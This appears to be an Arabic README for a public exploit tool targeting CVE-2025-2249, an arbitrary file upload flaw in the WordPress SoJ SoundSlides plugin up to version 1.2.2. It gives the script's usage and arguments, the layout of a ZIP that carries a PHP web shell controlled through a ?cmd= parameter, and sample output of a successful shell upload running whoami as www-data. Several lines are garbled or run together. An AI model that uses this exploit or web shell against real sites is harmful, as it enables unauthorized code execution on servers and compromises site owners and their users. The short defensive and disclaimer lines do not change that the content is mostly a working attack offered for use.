
المكوّن الإضافي SoJ SoundSlides لووردبريس <= 1.2.2 عرضة لثغرة رفع ملفات تعسفي
⚠️ إخلاء مسؤولية: هذا الاستغلال مخصص للأغراض التعليمية والاختبار المصرح به فقط.
يسمح المكوّن الإضافي SoJ SoundSlides للمستخدمين الموثقين بدور مساهم أو أعلى برفع ملفات ZIP عشوائية. وبسبب غياب التحقق من الصحة، يمكن للمهاجمين رفع قذائف ويب PHP يتم استخراجها وتنفيذها من دليل يمكن الوصول إليه عبر الويب.
يمكن للمهاجم الذي يمتلك بيانات اعتماد ووردبريس صالحة أن:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| الوسيط | الوصف |
|---|---|
-u | رابط ووردبريس الأساسي |
-un | اسم مستخدم ووردبريس |
-p | كلمة مرور ووردبريس |
readme.txt للمكوّنnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ بحثًا عن ملفات .php غير متوقعةصُنع بـ ❤️ بواسطة [Nxploited | Khaled ALenazi]
لأغراض التعليم والتوعية والدفاع.
الأمن مسؤولية الجميع. اختبر دائمًا بشكل أخلاقي، وأبلغ عن الثغرات بمسؤولية، واحمِ الويب.